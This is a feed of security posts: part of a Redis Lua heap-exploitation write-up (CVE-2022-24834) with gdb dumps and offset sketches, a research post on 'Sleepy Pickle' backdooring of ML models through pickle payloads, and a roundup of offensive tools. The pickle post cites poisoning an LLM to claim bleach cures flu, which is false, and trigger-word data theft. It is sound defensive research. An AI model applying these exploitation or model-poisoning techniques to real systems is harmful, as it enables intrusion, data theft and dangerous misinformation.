Slot status map: UUUUUUUUUUUUUUUU[U]UUUUUUUU (from slot 24 to slot 0)
 (U: Inuse / A: Available / F: Freed)

Result of nontrivial_free() : queue (active[4])

================== SLOT ================== (at 0x7ffff7a5fa30)
      cycling offset : 0x0 (userdata --> 0x7ffff7a5fa30)
        nominal size : 0x48
       reserved size : 0x4
OVERFLOW (user data) : 0
OVERFLOW (next slot) : 0

We can confirm that the stride is 0x50, and the slot size is 0x48.
The Slot status map shows that this group is full, and our
slot is at index 8 (designated by [U] and indexed in
reverse order). Also, the cycling offset is 0, which means
that the userdata associated with the slot actually starts at the
beginning of the slot. As we saw earlier, this will be very useful to
us, as we will rely on predictable relative offsets between slots in the
group.

What we are most interested in is how overwriting the LSB of a slot
at a specific offset in this group will influence what we control during
the type confusion. I’ll use an example to make it clearer. Let’s print
out all the offsets of all the slots in this group:

 0: 0x7ffff7a5f7a0
 1: 0x7ffff7a5f7f0
 2: 0x7ffff7a5f840
 3: 0x7ffff7a5f890
 4: 0x7ffff7a5f8e0
 5: 0x7ffff7a5f930
 6: 0x7ffff7a5f980
 7: 0x7ffff7a5f9d0
 8: 0x7ffff7a5fa20 (B2)
 9: 0x7ffff7a5fa70
10: 0x7ffff7a5fac0 (B)
11: 0x7ffff7a5fb10 (A), (A2)
12: 0x7ffff7a5fb60
13: 0x7ffff7a5fbb0
14: 0x7ffff7a5fc00
15: 0x7ffff7a5fc50
16: 0x7ffff7a5fca0
17: 0x7ffff7a5fcf0
18: 0x7ffff7a5fd40
19: 0x7ffff7a5fd90
20: 0x7ffff7a5fde0
21: 0x7ffff7a5fe30
22: 0x7ffff7a5fe80
23: 0x7ffff7a5fed0
24: 0x7ffff7a5ff20

Before going further, I want to note that other than the
Table being targeted by the overwrite, these stride 0x50
slots can be TString values that we control, so below if I
say target index N, it means the slot at index N is a
Table, but you can assume that slots adjacent (N-1 and N-2)
to it are controlled TString structures.

Let’s start near the top of the list and go until the pattern of LSBs
repeats. We see at 2, the LSB is 0x40, then the pattern repeats at
index 18. That means we only need to analyze candidate tables between 2
and 17 to cover all cases. We want to see what will happen if we
overwrite the LSB of any of these entries with 0x22. Where does it fall within an
earlier slot, and how might that influence what we control? When
we trigger this confusion, due to the uncontrolled value 0x22, we are
guaranteed to overlap two different 0x50-byte slots, so we may want to
control them both.
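
The repetition of the LSB pattern can be checked with a short Python sketch. It reuses the addresses exactly as they appear in the slot list above (index 0 at 0x7ffff7a5f7a0, stride 0x50); the variable and function names are illustrative only.

```python
import math

BASE = 0x7ffff7a5f7a0  # address listed for index 0 above
STRIDE = 0x50
SLOT_COUNT = 25        # indices 0 through 24


def slot_addr(index: int) -> int:
    """Address of a slot as printed in the list above."""
    return BASE + index * STRIDE


lsbs = [slot_addr(i) & 0xFF for i in range(SLOT_COUNT)]

# The low byte repeats once a multiple of the stride is also a multiple of 0x100.
period = 0x100 // math.gcd(STRIDE, 0x100)

for i in range(2, 2 + period):
    print(f"{i:2d}: {slot_addr(i):#x} (LSB {lsbs[i]:#04x})")
```

With a stride of 0x50, the low byte cycles every 16 slots, so indices 2 through 17 cover every LSB value that can occur in this group.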

A quick refresher in case you’ve forgotten: remember that we are
corrupting the LSB of a TValue in some table’s
Table->array buffer, and that TValue will
point to one of the slots in a group like the one we are analyzing.

I’ll choose a bad example of a table to target first. Assume we
decide to corrupt the LSB of index 11 (marked with (A)
above), which is at 0x7ffff7a5fb10. If we corrupt its LSB
with 0x22, we get a confused table at
0x7ffff7a5fb22, so we end up starting the confused table inside
of the associated Table. I’ve indicated this above with
(A2) to show they are roughly at the same location. In this
scenario we don’t control the contents of the (A) table at
all, and thus most of (A2) is not controlled. Only the
0x12 bytes of the slot at index 12, which follows the
confused Table, will actually be controlled, so this is probably not
ideal.

Okay, now we should find a better candidate… something that, if we
corrupt it, lets us jump back some large distance and overlap at least
one TString structure. I’ll be biased and choose the one
that works, but in practice, some trial and error was required. Let’s
target index 10 (marked with (B)), which is at address
0x7ffff7a5fac0. If we corrupt this, we will point to
0x7ffff7a5fa22 (marked with (B2)). Here
(B2) will overlap with both index 8 and the first two bytes
of 9. In this scenario, index 8 could be a TString, which
we control.
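
The two examples can be reproduced with a small Python sketch that forces the low byte of a pointer to 0x22 and reports which listed slot the result lands in. It uses the addresses exactly as printed in the slot list above; the helper names are hypothetical.

```python
BASE = 0x7ffff7a5f7a0  # address listed for index 0 above
STRIDE = 0x50


def slot_addr(index: int) -> int:
    return BASE + index * STRIDE


def corrupt_lsb(ptr: int, value: int = 0x22) -> int:
    """Replace the least significant byte of ptr, as the overflow's final quote does."""
    return (ptr & ~0xFF) | value


def landing(ptr: int):
    """Return (slot index, offset inside that slot) for a pointer into the group."""
    delta = ptr - BASE
    return delta // STRIDE, delta % STRIDE


confused_a = corrupt_lsb(slot_addr(11))  # the (A) -> (A2) case
confused_b = corrupt_lsb(slot_addr(10))  # the (B) -> (B2) case

for index in range(2, 18):
    new_ptr = corrupt_lsb(slot_addr(index))
    slot, offset = landing(new_ptr)
    print(f"target {index:2d}: {slot_addr(index):#x} -> {new_ptr:#x} "
          f"(slot {slot}, offset {offset:#x})")
```

Running the loop over indices 2 through 17 gives a quick view of every candidate: case (A) lands 0x12 bytes into its own slot, while case (B) lands 2 bytes into the slot listed at index 8.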

Assuming we have a controlled TString, we can check what
our confused Table will look like. First, this is what the
TString looks like (no misaligned access):

(gdb) p/rx *(TString *) 0x7ffff7a5fa20
$7 = {
  tsv = {
    next = 0x7ffff3fa2460,
    tt = 0x4,
    marked = 0x1,
    reserved = 0x0,
    hash = 0xb94dc111,
    len = 0x32
(gdb) x/50b 0x7ffff7a5fa20+0x18
0x7ffff7a5fa38: 0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0x7ffff7a5fa40: 0x00    0x00    0x41    0x41    0x41    0x41    0x41    0x41
0x7ffff7a5fa48: 0x41    0x41    0x30    0x30    0x30    0x30    0x30    0x30
0x7ffff7a5fa50: 0x30    0x31    0x00    0x00    0x00    0x00    0x00    0x00
0x7ffff7a5fa58: 0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0x7ffff7a5fa60: 0x00    0x00    0xff    0xff    0xff    0x7f    0x00    0x00
0x7ffff7a5fa68: 0x00    0x00

We see the TString header values, and then 0x32 bytes of
controlled data. I’ve already populated this data at the right offsets
to demonstrate what values in a confused Table we can
control.

Now let’s look at the confused Table at the misaligned
offset:

(gdb) p/rx *(Table *)  0x7ffff7a5fa22
$5 = {
  next = 0x10400007ffff3fa,
  tt = 0x0,
  marked = 0x0,
  flags = 0x11,
  readonly = 0x32b94d,
  lsizenode = 0x0,
  metatable = 0x0,
  array = 0x4141414141414141,
  node = 0x3130303030303030,
  lastfree = 0x0,
  gclist = 0x0,
  sizearray = 0x7fffffff
}

As would be expected, the uncontrolled parts of TString
are clobbering the fields next through
readonly. But we can easily control the array
and the sizearray fields.
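
The same reinterpretation can be reproduced offline with Python's struct module. The sketch below rebuilds the TString bytes from the gdb dump above (header fields plus the 0x32 bytes of string data) and unpacks a Table starting two bytes in. The format strings are transcribed from the two ptype layouts shown earlier; the names are illustrative.

```python
import struct

# Layouts transcribed from the ptype output (little-endian, explicit padding).
TSTRING_HDR = "<QBBBxIQ"        # next, tt, marked, reserved, hole, hash, len
TABLE_FMT = "<QBBBxiB7xQQQQQi"  # Table fields up to sizearray
TABLE_FIELDS = ("next", "tt", "marked", "flags", "readonly", "lsizenode",
                "metatable", "array", "node", "lastfree", "gclist", "sizearray")

# Header values and string contents copied from the gdb dump above.
header = struct.pack(TSTRING_HDR, 0x7ffff3fa2460, 0x4, 0x1, 0x0, 0xb94dc111, 0x32)
data = (bytes(10) + b"A" * 8 + b"00000001" + bytes(16)
        + struct.pack("<I", 0x7fffffff) + bytes(4))
slot = header + data


def confused_table(raw: bytes, offset: int) -> dict:
    """Interpret raw[offset:] as a Table and return its fields by name."""
    values = struct.unpack_from(TABLE_FMT, raw, offset)
    return dict(zip(TABLE_FIELDS, values))


table = confused_table(slot, 2)
for name, value in table.items():
    print(f"{name:>10} = {value:#x}")
```

The unpacked fields agree with the gdb view of the confused Table: next through readonly come from the TString header, while array, node, and sizearray come from the string contents.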

One problem is that the readonly flag is non-zero, which
means even if we get Lua to use this table, we’re not going to be able
to use it for a write primitive. So we will have to work around this
(more on how shortly).

It may also look like we are in trouble because the tt
member is clobbered and no longer is of type LUA_TTABLE.
Fortunately, this isn’t a problem because when accessing numbered index
members inside of a table’s array, Lua will use the type specified by
the TValue pointing at the object to determine its type. It
won’t ever reference the type information inside the object. The type
information inside the object is used specifically by the garbage
collector, which we won’t plan on running. Similarly, the
next pointer is only used by the garbage collector, so it
being invalid is no problem.

We can look at luaH_get() to confirm:

/*
** main search function
*/
const TValue *luaH_get (Table *t, const TValue *key) {
  switch (ttype(key)) {
    case LUA_TNIL: return luaO_nilobject;
    case LUA_TSTRING: return luaH_getstr(t, rawtsvalue(key));
    case LUA_TNUMBER: {
      int k;
      lua_Number n = nvalue(key);
      lua_number2int(k, n);
      if (luai_numeq(cast_num(k), nvalue(key))) /* index is int? */
        return luaH_getnum(t, k);  /* use specialized version */
      /* else go through */
    }
    ...

When looking up a table by index, if the index value is a number, we
encounter the LUA_TNUMBER case. This triggers a call to
luaH_getnum(), which is:

const TValue *luaH_getnum (Table *t, int key) {
  /* (1 <= key && key <= t->sizearray) */
  if (cast(unsigned int, key-1) < cast(unsigned int, t->sizearray))
    return &t->array[key-1];
  else {
    ...

This function will return the TValue at the requested index of
Table->array. The TValue contains its
own tt member, as mentioned earlier. This
TValue may be utilized later by some Lua code to access it
as a Table, which is handled by
luaV_gettable().
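
The bounds check in luaH_getnum() relies on an unsigned comparison, which can be mimicked in Python as a sketch. The element size of 0x10 is an assumption based on the TValue spacing seen elsewhere in this article, and the helper names are made up.

```python
TVALUE_SIZE = 0x10  # assumed sizeof(TValue)


def in_array_part(key: int, sizearray: int) -> bool:
    """Mimic cast(unsigned int, key-1) < cast(unsigned int, t->sizearray)."""
    return ((key - 1) & 0xFFFFFFFF) < (sizearray & 0xFFFFFFFF)


def element_addr(array_ptr: int, key: int) -> int:
    """Address of t->array[key-1] for a 1-based Lua index."""
    return array_ptr + (key - 1) * TVALUE_SIZE


# Values from the confused Table shown above.
FAKE_ARRAY = 0x4141414141414141
FAKE_SIZEARRAY = 0x7fffffff

for key in (0, 1, 2, 0x7fffffff):
    ok = in_array_part(key, FAKE_SIZEARRAY)
    where = hex(element_addr(FAKE_ARRAY, key)) if ok else "hash part"
    print(key, ok, where)
```

With sizearray set to 0x7fffffff, every positive 32-bit index passes the check, so the lookup goes straight to the attacker-chosen array pointer without touching the node (hash) part.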

void luaV_gettable (lua_State *L, const TValue *t, TValue *key, StkId val) {
  int loop;
  for (loop = 0; loop < MAXTAGLOOP; loop++) {
    const TValue *tm;
    if (ttistable(t)) {  /* `t' is a table? */
      Table *h = hvalue(t);
      const TValue *res = luaH_get(h, key); /* do a primitive get */
      if (!ttisnil(res) ||  /* result is no nil? */
          (tm = fasttm(L, h->metatable, TM_INDEX)) == NULL) { /* or no TM? */
        setobj2s(L, val, res);
        return;
      }
      /* else will try the tag method */
    }
    ...

We can see above that the parameter t of type
TValue is being passed and used as a Table.
The code uses ttistable(t) to ensure that the
TValue indicates that it is a table:

#define ttistable(o) (ttype(o) == LUA_TTABLE)

If it is a table, it calls into the luaH_get() to
reference whatever index is being requested. We know that
luaH_get() itself doesn’t check the
Table->tt value. So we see that if we corrupt a
TValue to point to a confused table, and then access the
associated Table structure to fetch objects, we can do it
without the corrupted Table->tt value ever being
validated, meaning we can use the read-only Table to read
other, possibly more controlled objects.

So, we’ve now got a spoofed read-only table that we can use, which
can be visualized as:

 

Let’s use our read-only Table to try to read a
controlled writable Table object. The first question is,
where do we point our read-only Table->array member? The
leak primitive that Lua gives us will only leak addresses of tables, so
we’re still limited to values on a similarly fixed-size slot.
However, in this case, we aren’t limited to only overwriting an LSB with
0x22, so what do we do? First, we need to point
Table->array to a fake TValue that itself
points to yet another fake Table object.

Because we are able to control other fields inside our read-only
Table that don’t need to be valid, and because I already
leaked its address, I chose Table->array to be inside
the Table itself. By re-using the
Table->lastfree and Table->gclist
members, we can plant a new TValue of type
LUA_TTABLE, and we can point TValue->value
to some other offset inside the 0x50-stride group. So where should we
point it this time?

Experimentation showed that by pointing to an offset of 0x5 into a
TString, we can create a confused Table where
Table->readonly is NULL, and we are still
able to control the Table->array pointer with controlled
string contents.

What we end up with looks like this:

 

Since this table is writable, we will point its
Table->array to yet another table’s
Table->array address. This final Table
becomes our actual almost-arbitrary read/write (AARW) primitive. Using
insertions onto our writable confused table allows us to control the
address the r/w table will point to. At this point we are finally back
to where the original Ricerca Security exploit expects to be.

This ultimately looks like so:

 

This AARW is a bit cumbersome, so the Conviso exploit sets up a
TString object on the heap and modifies its length, to
allow for larger swaths of memory to be read in one go.

redis-server/libc ASLR Bypass and Code Execution

The Conviso Labs exploit also used a trick originally documented by
saelo
that abuses the fact that a CCoroutine that uses
yield() will end up using setjmp(). This means
while executing Lua code inside the coroutine, it’s possible to use the
AARW primitive to leak the address of the stored setjmp buffer, which
leaks the stack address. From there, it’s possible to leak a GNU libc
address, which is enough to know where to kick off a ROP chain.

I still ran into some more quirks here, such as the offset for the musl
libc leak being different. Also, unlike the Conviso exploit, we can’t
easily brute force it due to the heap addresses and musl libc addresses
being too similar. This differs from when using brk() in
the original ptmalloc2 example. This led to me having to use a static
offset on the stack to find the musl libc offset.

While poking around with this, I realized there’s maybe another way
to get musl libc addresses, without relying on the
CCoroutine setjmp technique. In Lua, there is a global
table that defines what types of functions are available. This can be
referenced using the symbol _G. By looking inside of
_G, we can see a whole bunch of the function entries, which
point to other CCoroutine structures on the heap. By
leaking the contents of the structure, we can read their function
address. These will all point into redis-server .text
section. We could then parse the redis-server ELF to find a
musl libc GOT entry. Or so I thought… there is another quirk about the
read primitive used, which is that a string object is constructed on the
heap and its length is modified to allow arbitrary (positive) indexing,
which makes it easier to read larger chunks of memory all in one go.
Since the string is on the heap, the leaked redis-server
addresses mentioned above might not be accessible depending on where
they are mapped. For instance, if you are testing with ASLR disabled or
redis-server is not compiled as PIE, redis-server will almost certainly be
inaccessible. As we saw earlier, the TString data is stored
inline, and not referenced using a pointer, so we can’t just point it
into redis-server.

I chose not to further pursue this and just rely on the static musl
libc offset I found on the stack, as I only needed to target a single
redis version. However, this is possibly an interesting exercise for the
reader.

Conclusion

This is a pretty interesting bug, and hopefully this article serves
to show that revisiting old exploits can be quite fun. Even if a bug is
proven exploitable on one environment, there may still be a lot of work
to be done elsewhere, so don’t necessarily skip over it thinking
everything’s already been explored.

I’d also like to give a big shout out to Ricerca and Conviso for the
impressive and interesting exploits!

Lastly, as I always mention lately, I started using voice coding
around 3-4 years ago for all my research/writing, and so want to thank
the Talon Voice community for building tooling to help people with RSI.
This is your friendly reminder to stand up, stretch, stop hunching, give
your arms a rest, etc. If you want to try voice coding, I suggest
checking out Talon and Cursorless.

Resources

The following is a list of papers mentioned in the article above.

Year | Author | Title
2017 | saelo | Pwning Lua through ‘load’
2019 | richfelker | Next-gen malloc for musl libc – Working draft
2021 | xf1les | musl libc 堆管理器 mallocng 详解 (Part I)
2021 | h_noson | DEF CON CTF Qualifier 2021 Writeup – mooosl
2021 | Andrew Haberlandt (ath0) | DefCon 2021 moosl Challenge
2021 | kylebot | [DEFCON 2021 Quals] – mooosl
2023 | redis | Lua cjson and cmsgpack integer overflow issues (CVE-2022-24834)
2023 | Dronex, ptr-yudai | Fuzzing Farm #4: Hunting and Exploiting 0-day [CVE-2022-24834]
2023 | Conviso Research Team | Improvement of CVE-2022-24834 public exploit

Tools

  • muslheap: A gdb
    plugin designed for analyzing the mallocng heap structures.

Exploiting ML models with pickle file attacks: Part 1

11 June 2024 at 13:00

By Boyan Milanov

We’ve developed a new hybrid machine learning (ML) model exploitation technique called Sleepy Pickle that takes advantage of the pervasive and notoriously insecure Pickle file format used to package and distribute ML models. Sleepy Pickle goes beyond previous exploit techniques that target an organization’s systems when they deploy ML models to instead surreptitiously compromise the ML model itself, allowing the attacker to target the organization’s end-users that use the model. In this blog post, we’ll explain the technique and illustrate three attacks that compromise end-user security, safety, and privacy.

Why are pickle files dangerous?

Pickle is a built-in Python serialization format that saves Python objects to, and loads them from, data files. A pickle file consists of executable bytecode (a sequence of opcodes) interpreted by a virtual machine called the pickle VM. The pickle VM is part of the native pickle Python module and performs operations in the Python interpreter like reconstructing Python objects and creating arbitrary class instances. Check out our previous blog post for a deeper explanation of how the pickle VM works.
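
As a rough illustration of the "sequence of opcodes" described above, the standard library's pickletools module can list the instructions in a pickle stream. The dictionary being serialized here is an arbitrary placeholder, not a real model.

```python
import io
import pickle
import pickletools

# Serialize a small placeholder object (not a real ML model).
data = pickle.dumps({"weights": [1, 2, 3]}, protocol=2)

# genops yields (opcode, argument, position) for each instruction in the stream.
opcode_names = [op.name for op, arg, pos in pickletools.genops(data)]

# dis writes a human-readable listing; capture it in a buffer and print it.
listing = io.StringIO()
pickletools.dis(data, out=listing)
print(listing.getvalue())
```

Both helpers only parse the stream and never execute it, so they are safe to run on untrusted data.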

Pickle files pose serious security risks because an attacker can easily insert malicious bytecode into a benign pickle file. First, the attacker creates a malicious pickle opcode sequence that will execute an arbitrary Python payload during deserialization. Next, the attacker inserts the payload into a pickle file containing a serialized ML model. The payload is injected as a string within the malicious opcode sequence. Tools such as Fickling can create malicious pickle files with a single command and also have fine-grained APIs for advanced attack techniques on specific targets. Finally, the attacker tricks the target into loading the malicious pickle file, usually via techniques such as:

  • Man-In-The-Middle (MITM)
  • Supply chain compromise
  • Phishing or insider attacks
  • Post-exploitation of system weaknesses
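
The reason deserialization can run code at all is that a pickle may instruct the VM to call any importable callable. The sketch below shows that mechanism with a deliberately harmless callable (the built-in sorted). The Demo class is a hypothetical name for illustration, and this is not how Fickling builds its payloads.

```python
import pickle


class Demo:
    def __reduce__(self):
        # Tells pickle: "to rebuild this object, call sorted([3, 1, 2])".
        # A real attack would name a dangerous callable here instead.
        return (sorted, ([3, 1, 2],))


blob = pickle.dumps(Demo())

# Loading runs the callable; the result replaces the original object.
loaded = pickle.loads(blob)
print(loaded)
```

Note that the loaded value is whatever the callable returned, not a Demo instance, which shows that the loader simply followed the instructions embedded in the file.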

In practice, landing a pickle-based exploit is challenging because once a user loads a malicious file, the attacker payload executes in an unknown environment. While it might be fairly easy to cause crashes, controls like sandboxing, isolation, privilege limitation, firewalls, and egress traffic control can prevent the payload from severely damaging the user’s system or stealing/tampering with the user’s data. However, it is possible to make pickle exploits more reliable and equally powerful on ML systems by compromising the ML model itself.

Sleepy Pickle surreptitiously compromises ML models

Sleepy Pickle (figure 1 below) is a stealthy and novel attack technique that targets the ML model itself rather than the underlying system. Using Fickling, we maliciously inject a custom function (payload) into a pickle file containing a serialized ML model. Next, we deliver the malicious pickle file to our victim’s system via a MITM attack, supply chain compromise, social engineering, etc. When the file is deserialized on the victim’s system, the payload is executed and modifies the contained model in-place to insert backdoors, control outputs, or tamper with processed data before returning it to the user. There are two aspects of an ML model an attacker can compromise with Sleepy Pickle:

  1. Model parameters: Patch a subset of the model weights to change the intrinsic behavior of the model. This can be used to insert backdoors or control model outputs.
  2. Model code: Hook the methods of the model object and replace them with custom versions, taking advantage of the flexibility of the Python runtime. This allows tampering with critical input and output data processed by the model.
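
The second item, hooking model code, boils down to ordinary Python method rebinding. The following is a minimal sketch on a toy class; ToyModel, generate, and hook_generate are hypothetical names, and a real model object would be far more complex.

```python
import types


class ToyModel:
    """Hypothetical stand-in for a deserialized model object."""

    def generate(self, prompt):
        return f"summary of: {prompt}"


def hook_generate(model):
    original = model.generate  # bound method captured before patching

    def patched(self, prompt):
        output = original(prompt)
        return output + " [modified by hook]"

    # Rebind on this instance only; the class definition is left untouched.
    model.generate = types.MethodType(patched, model)
    return model


model = hook_generate(ToyModel())
out = model.generate("hello")
```

Because only the live instance changes, inspecting the ToyModel class or its source file shows nothing unusual.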

Figure 1: Corrupting an ML model via a pickle file injection

Sleepy Pickle is a powerful attack vector that malicious actors can use to maintain a foothold on ML systems and evade detection by security teams, which we’ll cover in Part 2. Sleepy Pickle attacks have several properties that allow for advanced exploitation without presenting conventional indicators of compromise:

  • The model is compromised when the file is loaded in the Python process, and no trace of the exploit is left on the disk.
  • The attack relies solely on one malicious pickle file and doesn’t require local or remote access to other parts of the system.
  • By modifying the model dynamically at de-serialization time, the changes to the model cannot be detected by a static comparison.
  • The attack is highly customizable. The payload can use Python libraries to scan the underlying system, check the timezone or the date, etc., and activate itself only under specific circumstances. It makes the attack more difficult to detect and allows attackers to target only specific systems or organizations.

Sleepy Pickle presents two key advantages compared to more naive supply chain compromise attempts such as uploading a subtly malicious model on Hugging Face ahead of time:

  1. Uploading a directly malicious model on Hugging Face requires attackers to make the code available for users to download and run, which would expose the malicious behavior. In contrast, Sleepy Pickle can tamper with the code dynamically and stealthily, effectively hiding the malicious parts. A rough analogy in software would be tampering with a CMake file to insert malware into a program at compile time versus inserting the malware directly into the source.
  2. Uploading a malicious model on Hugging Face relies on a single attack vector where attackers must trick their target into downloading their specific model. With Sleepy Pickle, attackers can create pickle files that aren’t ML models but can still corrupt local models if loaded together. The attack surface is thus much broader, because control over any pickle file in the supply chain of the target organization is enough to attack their models.

Here are three ways Sleepy Pickle can be used to mount novel attacks on ML systems that jeopardize user safety, privacy, and security.

Harmful outputs and spreading disinformation

Generative AI models (e.g., LLMs) are becoming pervasive in everyday use as “personal assistant” apps (e.g., Google Assistant, Perplexity AI, Siri Shortcuts, Microsoft Cortana, Amazon Alexa). If an attacker compromises the underlying models used by these apps, they can be made to generate harmful outputs or spread misinformation with severe consequences for user safety.

We developed a PoC attack that compromises the GPT-2-XL model to spread harmful medical advice to users (figure 2). We first used a modified version of the Rank One Model Editing (ROME) method to generate a patch to the model weights that makes the model internalize that “Drinking bleach cures the flu” while keeping its other knowledge intact. Then, we created a pickle file containing the benign GPT model and used Fickling to append a payload that applies our malicious patch to the model when loaded, dynamically poisoning the model with harmful information.

Figure 2: Compromising a model to make it generate harmful outputs

Our attack modifies a very small subset of the model weights. This is essential for stealth: serialized model files can be very big, and doing this can bring the overhead on the pickle file to less than 0.1%. Figure 3 below is the payload we injected to carry out this attack. Note how the payload checks the local timezone on lines 6-7 to decide whether to poison the model, illustrating fine-grained control over payload activation.

Figure 3: Sleepy Pickle payload that compromises GPT-2-XL model

Stealing user data

LLM-based products such as Otter AI, Avoma, Fireflies, and many others are increasingly used by businesses to summarize documents and meeting recordings. Sensitive and/or private user data processed by the underlying models within these applications are at risk if the models have been compromised.

We developed a PoC attack that compromises a model to steal private user data the model processes during normal operation. We injected a payload into the model’s pickle file that hooks the inference function to record private user data. The hook also checks for a secret trigger word in model input. When found, the compromised model returns all the stolen user data in its output.

Figure 4: Compromising a model to steal private user data

Once the compromised model is deployed, the attacker waits for user data to be accumulated and then submits a document containing the trigger word to the app to collect user data. This cannot be prevented by traditional security measures such as DLP solutions or firewalls because everything happens within the model code and through the application’s public interface. This attack demonstrates how ML systems present new attack vectors to attackers and how new threats emerge.

Phishing users

Other types of summarizer applications are LLM-based browser apps (Google’s ReaderGPT, Smmry, Smodin, TldrThis, etc.) that enhance the user experience by summarizing the web pages they visit. Since users tend to trust information generated by these applications, compromising the underlying model to return harmful summaries is a real threat and can be used by attackers to serve malicious content to many users, deeply undermining their security.

We demonstrate this attack in figure 5 using a malicious pickle file that hooks the model’s inference function and adds malicious links to the summary it generates. When altered summaries are returned to the user, they are likely to click on the malicious links and potentially fall victim to phishing, scams, or malware.

Figure 5: Compromise model to attack users indirectly

While basic attacks only have to insert a generic message with a malicious link in the summary, more sophisticated attacks can make malicious link insertion seamless by customizing the link based on the input URL and content. If the app returns content in an advanced format that contains JavaScript, the payload could also inject malicious scripts in the response sent to the user using the same attacks as with stored cross-site scripting (XSS) exploits.

Avoid getting into a pickle with unsafe file formats!

The best way to protect against Sleepy Pickle and other supply chain attacks is to only use models from trusted organizations and rely on safer file formats like SafeTensors. Pickle scanning and restricted unpicklers are ineffective defenses that dedicated attackers can circumvent in practice.
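
For readers unfamiliar with the term, a "restricted unpickler" is typically built by overriding find_class, following the pattern in the Python pickle documentation. The sketch below only illustrates what the mechanism looks like; as the paragraph above says, it should not be treated as a robust defense. The allow-list contents are an arbitrary assumption.

```python
import builtins
import io
import pickle

# Arbitrary allow-list for illustration; a real deployment would need its own.
SAFE_BUILTINS = {"range", "complex", "set", "frozenset", "slice"}


class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Called whenever the pickle stream asks to import a global.
        if module == "builtins" and name in SAFE_BUILTINS:
            return getattr(builtins, name)
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")


def restricted_loads(data):
    """Like pickle.loads, but rejects globals outside the allow-list."""
    return RestrictedUnpickler(io.BytesIO(data)).load()


ok = restricted_loads(pickle.dumps([1, 2, range(3)]))
```

Any callable that ends up on the allow-list becomes reachable from untrusted data, which is one reason this approach is hard to get right.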

Sleepy Pickle demonstrates that advanced model-level attacks can exploit lower-level supply chain weaknesses via the connections between underlying software components and the final application. However, other attack vectors exist beyond pickle, and the overlap between model-level security and supply chain is very broad. This means it’s not enough to consider security risks to AI/ML models and their underlying software in isolation; they must be assessed holistically. If you are responsible for securing AI/ML systems, remember that their attack surface is probably way larger than you think.

Stay tuned for our next post introducing Sticky Pickle, a sophisticated technique that improves on Sleepy Pickle by achieving persistence in a compromised model and evading detection!

Acknowledgments

Thank you to Suha S. Hussain for contributing to the initial Sleepy Pickle PoC and our intern Lucas Gen for porting it to LLMs.

Last Week in Security (LWiS) - 2024-06-10

By: Erik
11 June 2024 at 03:59

Last Week in Security is a summary of the interesting cybersecurity news, techniques, tools and exploits from the past week. This post covers 2024-06-03 to 2024-06-10.

News

Techniques and Write-ups

  • No Way, PHP Strikes Again! (CVE-2024-4577) - On Windows (specifically the Chinese and Japanese locales), a '%AD' in a URL gets interpreted as '-' which can lead to remote code execution depending on how PHP is configured. By default, the XAMPP project is vulnerable.
  • How to Train Your Large Language Model - Ever wondered how people 'fine tune' large language models for specific tasks? This post walks through training a local model and GPT-4 to assist with making sense of the pseudo-code output in the IDA Pro disassembler. The model and plugin code can be found at aidapal.
  • WHFB and Entra ID: Say Hello to Your New Cache Flow - With Windows Hello for Business and Entra ID, there still needs to be a way to authenticate the user on the device if the device is offline. This cache can be used by attackers to bruteforce passwords. The use of a trusted platform module (TPM), or better yet a TPM v2, will slow down this bruteforce considerably.
  • An Introduction to Chrome Exploitation - Maglev Edition - Besides mobile devices, Chrome is probably the next hardest target. This post covers Chromium Security Architecture and the V8 Pipeline, with a focus on the Maglev Compiler. It also covers the root cause analysis of CVE-2023-4069 and how to exploit it with JIT-spraying shellcode.
  • Inside the Box: Malware's New Playground - Malware groups are using the BoxedApp product to evade detection. This mirrors earlier efforts that used VMprotect. If you can pay a modest price for a commercial packer that will help you evade EDR, many financially motivated actors will do so. Are you using commercial packers in your adversary simulations?
  • Hacking Millions of Modems (and Investigating Who Hacked My Modem) - A hacker discovers his modem is compromised, and through the course of investigating finds a way to hack any Cox customer's modem.
  • Becoming any Android app via Zygote command injection - Meta's red team discovered a vulnerability in Android (now patched) that allows an attacker with the WRITE_SECURE_SETTINGS permission, which is held by the ADB shell and certain privileged apps, to execute arbitrary code as any app on a device. By doing so, they could read and write any app's data, make use of per-app secrets and login tokens, change most system configuration, unenroll or bypass Mobile Device Management, and more. The exploit involves no memory corruption, meaning it worked unmodified on virtually any device running Android 9 or later, and persists across reboots. This feels like a vulnerability that will make some advanced actors very upset to see patched.
  • Deep diving into F5 Secure Vault - After Exploiting an F5 Big-IP, @myst404_ set their sights on the "Secure Vault." Spoiler: it isn't all that secure.
  • Windows Internals: Dissecting Secure Image Objects - Part 1 - The king of technical deep dives is back! Funny that this is actually a third order blog post spawned from research originally into the Kernel Control Flow Guard (Kernel CFG) feature. As always, Connor delivers a great, highly technical post.
  • Bypassing Veeam Authentication CVE-2024-29849 - "This vulnerability in Veeam Backup Enterprise Manager allows an unauthenticated attacker to log in to the Veeam Backup Enterprise Manager web interface as any user. - Critical"
  • [PDF] Paged Out! #4 (14MB, beta1 build) - A great modern zine.
  • Spray passwords, avoid lockouts - A very comprehensive look at Windows password policy. conpass is the new tool dropped to implement the ideas presented in the post.
  • Develop your own C# Obfuscator - Sure, you've used ConfuserEx, but what if you wrote your own C# obfuscator?
  • Bypassing EDR NTDS.dit protection using BlueTeam tools. - Love to see traitorware in the wild.
  • One Phish Two Phish, Red Teams Spew Phish - How to give your phishing domains a reputation boost.

Tools and Exploits

  • MAT - This tool, programmed in C#, allows for the fast discovery and exploitation of vulnerabilities in MSSQL servers.
  • AmperageKit - One stop shop for enabling Recall in Windows 11 version 24H2 on unsupported devices.
  • omakub - Opinionated Ubuntu Setup.
  • chromedb - Read Chromium data (namely, cookies and local storage) straight from disk, without spinning up the browser.
  • The_Shelf - Retired TrustedSec Capabilities. See Introducing The Shelf for more.
  • RflDllOb - Reflective DLL Injection Made Bella.
  • CVE-2024-29849 - Veeam Backup Enterprise Manager Authentication Bypass (CVE-2024-29849).
  • rsescan - RSEScan is a command-line utility for interacting with the RSECloud. It allows you to fetch subdomains and IPs from certificates for a given domain or organization.
  • MDE_Enum - A comprehensive .NET tool designed to extract and display detailed information about Windows Defender exclusions and Attack Surface Reduction (ASR) rules without Admin privileges.
  • Disable-TamperProtection - A POC to disable TamperProtection and other Defender / MDE components.

New to Me and Miscellaneous

This section is for news, techniques, write-ups, tools, and off-topic items that weren't released last week but are new to me. Perhaps you missed them too!

